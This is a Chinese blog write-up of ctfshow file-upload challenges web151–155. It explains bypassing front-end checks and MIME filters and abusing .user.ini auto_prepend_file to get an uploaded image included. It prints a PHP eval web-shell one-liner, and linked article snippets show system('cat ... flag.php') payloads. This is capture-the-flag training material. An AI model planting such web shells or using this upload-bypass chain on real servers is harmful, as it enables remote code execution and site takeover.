ctfshow web入门文件上传 web151-web155

最新推荐文章于 2024-05-23 22:03:05 发布
最新推荐文章于 2024-05-23 22:03:05 发布
阅读量257 收藏 1
点赞数 3
分类专栏: ctfshow通关 文章标签: 前端
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_62207170/article/details/136660828
版权

1.web151

前端验证,修改html代码,上传还有一句话木马的php文件,之后用蚁剑连接即可找到flag

<?php eval($_POST[1])?>

在这里插入图片描述

2.web152

前端有验证,还是需要修改html代码
burp抓包,修改content-type为image/png
在这里插入图片描述
连接蚁剑,得到flag

3.web153

前端有验证,还是需要修改html代码
尝试了以下修改mime并没有绕过,猜测检测了后缀和mime类型
burp抓包,上传.user.ini,此配置文件时nginx服务的配置文件,写入auto_prepend_file=2.jpg,在上传2.jpg,2.jpg中写入一句话,之后把http://d6a3715e-bc9a-4bc2-8e1e-e540b0bbaeaf.challenge.ctf.show/upload/index.php 添加到蚁剑中即可读取flag,访问此链接时会自动包含2.jpg

.user.ini利用需要在此目录下还有php文件,user.ini 上传的文件  原有的php文件需要在同一目录下
.user.ini
auto_prepend_file     表示在文件头包含
auto_append_file       表示在文件尾包含

上传.user.ini
在这里插入图片描述

4.web154

通过测试发现,检查mime,后缀和文件内容,里面不能有php
上传.user.ini ,写入auto_prepend_file=2.png ,在上传2.php 写一句话木马 <? eval($_POST[1])?>,在把链接加到蚁剑即可读取flag
上传.user.ini
在这里插入图片描述
上传2.png
在这里插入图片描述

5.web155

和上题一样,注意这里只能使用png,和上题的区别限制了图片只能是png

mushangqiujin
关注
  • 3
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
CTFshow Web入门 文件上传
m0_62905261的博客
10-05 799
CTFshow Web入门 文件上传
CTFshow刷题日记-WEB-文件上传
Love&Share
09-08 1468
web151-前端绕过 简单只要在前端把exts:png改成php exts:'php' 访问 /upload/shell.php?shell=system("tac ../flag.php"); web152-content-type绕过 这次不改前端了,直接在bp改,将Content-Type改成 image/png 总结下常见conten-type类型 常见的媒体格式类型如下: text/html : HTML格式 text/plain :纯文本格式 text/xml : XML格式 im
CTFshow之文件上传web入门151关-161关解密。包教包会!!!!
最新发布
2301_77578012的博客
05-23 1144
当网站进行扫描时,会将.user.ini文件指向路径内容包含在首页代码处(如index.php、index.html等),使用参数auto_prepend_file(包含至首页文件头部)和auto_append_file(包含在首页文件尾部)进行配置。发送一句话木马,修改content-type值为:image/png,此处注意一下,我直接上传.php文件发现无法通过,定睛一看才发现前端验证还没关,汗颜!上传1.png的木马。2.上传.user.ini文件(使用bp中repaeater重发器功能进行上传)
ctfshow-web153(文件上传)
m0_62094846的博客
01-17 1893
.user.ini 原理: 指定一个文件(如a.jpg),那么该文件就会被包含在要执行的php文件中(如index.php),类似于在index.php中插入一句:require(./a.jpg);这两个设置的区别只是在于auto_prepend_file是在文件前插入;auto_append_file在文件最后插入(当文件调用的有exit()时该设置无效)所以要求当前目录必须要有php文件,巧合的是这题upload目录下有个index.php所以这种方式是可以成功的。 注:auto_append_
Ctfshow web入门 PHP特性篇 web89-web151
Jay17的博客
07-10 1819
Ctfshow web入门 PHP特性篇 web89-web151web入门 PHP特性篇的wp都一把梭哈在这里啦~ 有点多,师傅们可以收藏下来慢慢看,写的应该挺全面的叭..... 有错误敬请斧正!
ctfshow 文件上传 web151~170
shinygod的博客
03-22 1331
目录web151web 152web 153web 154web 155web 156 web151 上传提示,前端验证 上传.jpg文件然后抓包,改文件名为.php,加入一句话木马。 upload/1.php?1=system("cat /var/www/html/flag.php"); web 152 同上,但对Content-Type进行了过滤。 upload/1.php?1=system("cat /var/www/html/flag.php"); web 153 过滤了php,大小写改一
ctfshow-VIP题目-Web-详细解题思路
01-27
本文档总结了CTFSHOW-VIP题目-Web的详细解题思路,涵盖了多个Web安全领域的知识点,包括WP源码泄露、协议头信息泄露、robots后台泄露、phps源码泄露、源码压缩包泄露、版本控制泄露、vim临时文件泄露、cookie泄露、...
CTFshow-菜狗杯-WEB-变量循环取值-我的眼里只有$
03-04
【压缩包子文件的文件名称列表】"CTFshow-变量循环取值-我的眼里只有$" 提供了一个可能包含源代码、日志、测试数据或其他相关资源的文件。参赛者可能需要分析这个文件,寻找与题目相关的线索,比如错误的变量赋值、...
ctfshow web223-group盲注无数字
10-21
ctfshow web223-group盲注无数字
CTFSHOW web193 left标注盲注脚本
05-04
这段代码是一个用于获取某个网站的 flag 的脚本。它使用了 SQL 注入漏洞来获取 flag。具体来说,它通过构造 SQL 语句的方式,逐个字符地获取 flag。其中,它通过修改注入语句中的 payload 变量,来获取不同的信息,...
ctfshow web184 正则爆破脚本0x16进制
10-21
ctfshow web184 正则爆破脚本0x16进制
CTFSHOW系列-web151(文件上传-js前端验证)
siu~
12-07 638
CTFSHOW系列解题思路
ctfshow-文件上传(web151-web161)
m0_72125469的博客
02-12 1687
ctfshow-web151 web152 web153 web154 web155 web156 web157 web158 web159 web160 web161
ctfshow web入门(文件上传)
qq_53263789的博客
07-19 2267
ctfshow 文件上传
web153
weixin_30552811的博客
07-28 161
电影网站:www.aikan66.com 项目网站:www.aikan66.com 游戏网站:www.aikan66.com 图片网站:www.aikan66.com 书籍网站:www.aikan66.com 学习网站:www.aikan66.com Java网站:www.aikan66.com iOS网站:www.aikan66.com ---- 为Action...
ctf.show文件上传(web151-web170)
wanan的博客
08-31 386
ctf.show文件上传(web151-web170)
CTFshow 文件上传 web153
Kradress的博客
02-15 1750
目录思路总结 思路 先上传带shell的png文件,上传成功 把文件后缀改成php,上传失败,改成xxxxx上传成功,得知是黑名单过滤, 上传phtml后缀,可以成功上传,但是无法解析,可以试试上传配置文件,访问upload,发现有可执行文件index.php,可以用上传.user.ini来进行文件包含(题目是nginx) user.ini.它比.htaccess用的更广,不管是nginx/apache/IIS,只要是以fastcgi运行的php都可以用这个方法。 条件: 服务器脚本语言为PHP
CTFshow之web151~160---文件上传(上)
金 帛的博客
06-02 1875
ctfshow的wp
ctfshow文件上传
遇事不决冲冲冲
10-20 3198
web151-前端绕过 提示前台校验不可靠,上传png图片,burp抓包修改为php 任意命令执行 这里关闭js的话点击上传图片就没有反应了。 web152-后端绕过 一模一样的步骤,应该上一题前端判断的做法是修改前端代码吧 web153-.user.ini绕过 这里要上传user.ini进行文件上传绕过 简单理解就是.user.ini文件中有一个auto_prepend_file = <filename> //包含在文件头配置项,它的作用的是在同目录.php文件中包含<filen
ctfshow web入门文件上传
09-29
文件上传是CTF比赛中的一个常见挑战之一。其中一种方法是通过上传包含恶意代码的文件来绕过服务器的文件类型限制。比如,在上传图片时,可以同时上传一个名为.user.ini的文件,并在其中设置auto_append_file参数来包含木马文件。这样,每个PHP文件都会包含我们上传的恶意代码。 另一种方法是通过修改上传文件的Content-Type来绕过服务器对文件类型的过滤。比如,可以先上传一个zip文件,然后通过抓包工具修改请求的Content-Type为image/png,并将文件内容过滤的敏感字符替换掉,这样就能成功上传php等格式的文件。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值